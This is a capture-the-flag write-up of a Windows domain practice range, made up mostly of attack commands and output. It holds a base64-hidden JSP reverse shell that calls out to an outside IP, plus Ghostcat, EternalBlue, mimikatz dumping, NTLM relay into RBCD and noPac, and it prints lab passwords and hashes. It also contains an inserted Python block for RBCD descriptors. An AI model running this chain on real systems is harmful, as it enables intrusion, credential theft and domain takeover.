春秋云镜 - Spoofing - Writeup
fscan scan:
39.98.115.177:22 open
39.98.115.177:8009 open
39.98.115.177:8080 open
The web side returns 404 for everything, so run dirsearch against it.
It finds /docs.
Tomcat 9.0.30.
This Tomcat version is affected by the AJP file-inclusion vulnerability (Ghostcat, CNVD-2020-10487 / CVE-2020-1938), and the target conveniently exposes the AJP port 8009:
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
python2 poc.py 39.98.115.177 -p 8009 -f /WEB-INF/web.xml
Output:
Getting resource at ajp13://39.98.115.177:8009/asdf
----------------------------
<!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_3.dtd" >
<web-app>
  <display-name>Archetype Created Web Application</display-name>
  <security-constraint>
    <display-name>Tomcat Server Configuration Security Constraint</display-name>
    <web-resource-collection>
      <web-resource-name>Protected Area</web-resource-name>
      <url-pattern>/upload/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>admin</role-name>
    </auth-constraint>
  </security-constraint>
  <error-page>
    <error-code>404</error-code>
    <location>/404.html</location>
  </error-page>
  <error-page>
    <error-code>403</error-code>
    <location>/error.html</location>
  </error-page>
  <error-page>
    <exception-type>java.lang.Throwable</exception-type>
    <location>/error.html</location>
  </error-page>
  <servlet>
    <servlet-name>HelloServlet</servlet-name>
    <servlet-class>com.example.HelloServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>HelloServlet</servlet-name>
    <url-pattern>/HelloServlet</url-pattern>
  </servlet-mapping>
  <servlet>
    <display-name>LoginServlet</display-name>
    <servlet-name>LoginServlet</servlet-name>
    <servlet-class>com.example.LoginServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>LoginServlet</servlet-name>
    <url-pattern>/LoginServlet</url-pattern>
  </servlet-mapping>
  <servlet>
    <display-name>RegisterServlet</display-name>
    <servlet-name>RegisterServlet</servlet-name>
    <servlet-class>com.example.RegisterServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>RegisterServlet</servlet-name>
    <url-pattern>/RegisterServlet</url-pattern>
  </servlet-mapping>
  <servlet>
    <display-name>UploadTestServlet</display-name>
    <servlet-name>UploadTestServlet</servlet-name>
    <servlet-class>com.example.UploadTestServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>UploadTestServlet</servlet-name>
    <url-pattern>/UploadServlet</url-pattern>
  </servlet-mapping>
  <servlet>
    <display-name>DownloadFileServlet</display-name>
    <servlet-name>DownloadFileServlet</servlet-name>
    <servlet-class>com.example.DownloadFileServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>DownloadFileServlet</servlet-name>
    <url-pattern>/DownloadServlet</url-pattern>
  </servlet-mapping>
</web-app>
UploadServlet is a file upload page. Note that /upload/* sits behind a security-constraint requiring the admin role, so the uploaded file cannot simply be fetched over HTTP; the AJP inclusion does not go through that constraint.
Write a JSP reverse shell into a .txt, upload it, then include it via AJP:
<%
// Brace expansion keeps the exec() argument free of spaces; bash expands it to
//   echo <b64> | base64 -d | bash -i
// and the base64 decodes to: bash -i >& /dev/tcp/42.192.42.48/2333 0>&1
Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Mi4xOTIuNDIuNDgvMjMzMyAwPiYx}|{base64,-d}|{bash,-i}").getInputStream();
%>
python2 poc.py 39.98.115.177 -p 8009 -f upload/25069433eea324da0f3a2270845a3420/20231011113651365.txt
That did not produce a shell, so switch to a different exploit:
https://github.com/hypn0s/AJPy
python3 tomcat.py read_file -webapp=ROOT upload/4ea270cbc2f5958b57568f269404874e/20231011114651442.txt 39.98.115.177
The shell comes back as root straight away; first flag obtained.
Upload fscan and scan the internal network:
172.22.11.6 XIAORANG\XIAORANG-DC
172.22.11.26 XIAORANG\XR-LCM3AE8B
172.22.11.45 XR-DESKTOP.xiaorang.lab MS17-010
172.22.11.76 (already compromised; this is our foothold)
Since we are root and port 22 is open, generate an SSH key pair and append the public key to root's authorized_keys:
echo "xxxx...." >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
Now we can SSH in; set up a SOCKS tunnel with dynamic forwarding:
ssh -i id_rsa -N -D 1050 root@39.98.115.177
172.22.11.45 is vulnerable to MS17-010, so hit it with msf through the SOCKS proxy. A bind payload is used because the target has no route back to the attacker through the proxy; LPORT here is the port the payload listens on on the target.
use exploit/windows/smb/ms17_010_eternalblue
setg Proxies socks5:127.0.0.1:1050
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 172.22.11.45
set lport 1433
run
Got in; second flag obtained.
load kiwi
creds_all
This yields credentials for one domain user and one machine account; yangmei's plaintext password is xrihGHgoNZQ.
Try noPac.
First add a machine account:
proxychains4 -q addcomputer.py xiaorang.lab/yangmei:xrihGHgoNZQ -computer-name TEST\$ -computer-pass 123456 -dc-host XIAORANG-DC.xiaorang.lab -dc-ip 172.22.11.6
That fails; ms-DS-MachineAccountQuota is probably set to 0.
Scanning shows PetitPotam (EFSRPC authentication coercion) is available.
172.22.11.26 has the WebClient service running.
So consider NTLM relay over HTTP: the WebDAV client authenticates over HTTP, and an HTTP-to-LDAP relay is not stopped by the signing requirements that defeat SMB-to-LDAP relay.
Without AD CS there is no PKINIT, so Shadow Credentials is out; RBCD is the option.
Plan: use PetitPotam to make the host running WebClient authenticate to us over HTTP with its machine account, relay that NTLM authentication to LDAP on the DC, and, acting as that machine account, write the SID of a machine account we control into its msDS-AllowedToActOnBehalfOfOtherIdentity.
We cannot create a machine account, but the earlier credential dump already gave us the NT hash of XR-DESKTOP$, so that is the account to delegate to.
Start the NTLM relay:
proxychains4 -q ntlmrelayx.py -t ldap://172.22.11.6 --escalate-user 'XR-DESKTOP$' --delegate-access --no-dump
Add a DNS record pointing at our foothold. WebDAV coercion needs a hostname rather than an IP, and the WebClient only authenticates transparently to names it treats as intranet, which a single-label name such as test satisfies:
proxychains4 -q bloodyAD -d xiaorang.lab -u yangmei -p xrihGHgoNZQ --host 172.22.11.6 add dnsRecord test 172.22.11.76
The record shows up, so test now resolves to 172.22.11.76.
Next, an SSH remote port forward: sshd on 172.22.11.76 listens on port 81 and relays connections back to port 80 on the attacker box, where ntlmrelayx's HTTP listener is waiting:
ssh -i id_rsa -N -R 81:127.0.0.1:80 root@39.98.115.177
By default sshd binds remote forwards to 127.0.0.1 only (GatewayPorts no), so port 81 is not reachable from the domain hosts.
Use iox on the foothold to relay 0.0.0.0:80 to 127.0.0.1:81 (port 80, because the WebClient will connect to http://test/):
iox fwd -l 80 -r 127.0.0.1:81
Now trigger authentication from 172.22.11.26 with PetitPotam, pointing the listener path at the test hostname we registered:
proxychains4 -q python3 PetitPotam.py -u yangmei -p 'xrihGHgoNZQ' -d xiaorang.lab test/pwn.txt 172.22.11.26
At this point RBCD is configured: XR-LCM3AE8B$ now allows XR-DESKTOP$ to act on behalf of other identities.
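After ntlmrelayx reports the delegation as written, it is worth checking what actually landed in the attribute rather than trusting the log line. The following is an added example, not from the writeup or from impacket, that builds and decodes the self-relative security descriptor stored in msDS-AllowedToActOnBehalfOfOtherIdentity: Control 0x8004 (SE_DACL_PRESENT | SE_SELF_RELATIVE), owner BUILTIN\Administrators (S-1-5-32-544), no group or SACL, and one ACCESS_ALLOWED_ACE with mask 0x000F01FF per delegated SID, which is the layout impacket's RBCD code writes. The domain SID in the test is made up; in practice you would fetch the attribute over LDAP from 172.22.11.6 (for example with ldapsearch as yangmei) and pass its raw bytes to sids_allowed_to_act(), expecting the SID of XR-DESKTOP$ and nothing else.

```python
import struct

# Added example: encode/decode the msDS-AllowedToActOnBehalfOfOtherIdentity
# security descriptor (MS-DTYP self-relative SECURITY_DESCRIPTOR). Not impacket code.

FULL_CONTROL = 0x000F01FF           # GenericAll; the mask impacket grants for RBCD
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"


def sid_to_bytes(sid):
    """Encode 'S-1-<authority>-<sub>-...' into its binary SID form."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID: %r" % sid)
    authority = int(parts[2])
    subs = [int(x) for x in parts[3:]]
    return (struct.pack("<BB", 1, len(subs))          # revision, sub-authority count
            + authority.to_bytes(6, "big")            # 48-bit identifier authority
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(data):
    """Decode a binary SID; returns (sid_string, bytes_consumed)."""
    revision, count = struct.unpack_from("<BB", data, 0)
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, data, 8)
    return ("S-%d-%d-" % (revision, authority) + "-".join(str(s) for s in subs),
            8 + 4 * count)


def build_allowed_to_act(delegated_sids):
    """Self-relative SECURITY_DESCRIPTOR granting full control to each SID,
    i.e. the value written to the target computer object for RBCD."""
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    aces = b""
    for sid in delegated_sids:
        sid_b = sid_to_bytes(sid)
        # ACE: type, flags, size, access mask, then the trustee SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0,
                            8 + len(sid_b), FULL_CONTROL) + sid_b
    # ACL header: revision 4 (ACL_REVISION_DS), sbz1, size, ace count, sbz2
    dacl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(delegated_sids), 0) + aces
    # SD header: revision, sbz1, control, offsets of owner/group/sacl/dacl (0 = absent)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         20, 0, 0, 20 + len(owner))
    return header + owner + dacl


def sids_allowed_to_act(sd):
    """Return the SIDs holding ACCESS_ALLOWED entries in the descriptor's DACL.
    An absent DACL yields [] here; note that in AD an absent DACL means
    'no restriction', while an empty DACL means 'nobody'."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos = off_dacl + 8
    found = []
    for _ in range(ace_count):
        ace_type, _, ace_size, _ = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = bytes_to_sid(sd[pos + 8:pos + ace_size])
            found.append(sid)
        pos += ace_size
    return found


if __name__ == "__main__":
    demo = build_allowed_to_act(["S-1-5-21-111-222-333-1105"])  # made-up SID
    print(demo.hex())
    print(sids_allowed_to_act(demo))
```

The decoder is also the cleanup check: once the flag is in hand, clearing the attribute (or restoring its previous value, which ntlmrelayx prints before overwriting) and re-reading it with sids_allowed_to_act() confirms the delegation is gone.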
Next, as XR-DESKTOP$, request a service ticket for the CIFS service on XR-LCM3AE8B while impersonating Administrator (S4U2self followed by S4U2proxy):
proxychains4 -q getST.py xiaorang.lab/'XR-DESKTOP$' -hashes ':4feda238ac28737160f577039b06b51e' -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate Administrator -dc-ip 172.22.11.6
Load the ticket:
export KRB5CCNAME=Administrator.ccache
Then move laterally with it:
proxychains4 psexec.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -dc-ip 172.22.11.6 -codec gbk
Third flag obtained.
Copy mimikatz over with smbclient:
proxychains4 smbclient.py XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26
mimikatz yields zhanghui's NT hash: 1232126b24cdf8c9bd2f788a9d7c7ed1
That account is allowed to add machine accounts.
So run noPac with it directly:
proxychains4 -q python3 noPac.py xiaorang.lab/zhanghui -hashes :1232126b24cdf8c9bd2f788a9d7c7ed1 -dc-ip 172.22.11.6 --impersonate Administrator -create-child -use-ldap -shell
Final flag obtained.